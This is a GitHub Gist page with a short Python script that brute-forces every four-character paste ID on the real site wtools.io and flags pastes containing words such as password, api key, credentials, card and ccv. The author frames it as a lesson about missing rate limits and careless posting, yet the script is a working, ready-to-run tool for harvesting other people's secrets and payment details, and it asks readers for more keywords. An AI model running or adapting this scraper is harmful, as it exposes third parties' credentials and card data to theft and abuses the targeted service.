Last active
October 23, 2020 20:21
-
-
Save GeorgeGerontakis/49d92b55bc531dc2cd3965f98076d977 to your computer and use it in GitHub Desktop.
wtools.io sensitive code pastes finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #this is what happens when you don't limit request rate | |
| #this is also what happens when you don't understand your actions as a developer, posting sensitive data.. | |
| #take care.. | |
| #*please do write @ comments ideas for more keywords :-)* | |
| import requests | |
| import itertools | |
| #use your imagination here :-) | |
| keywords = ["api", "key", "pass", "password", "username", "user" ,"secret", "creds", "credentials", "email", "phone" , "mobile", "card", "expiration date", "ccv"] | |
| chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" | |
| for xs in itertools.product(chars, repeat=4): | |
| keywords_found = [] | |
| id = ''.join(xs) | |
| link = f"https://wtools.io/code/raw/{id}" | |
| response = requests.get(link) | |
| if response.status_code != 404: | |
| for keyword in keywords: | |
| if keyword in response.text.lower(): | |
| keywords_found.append(keyword) | |
| if keywords_found: print(f"Found: {str(keywords_found)} in {link}") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment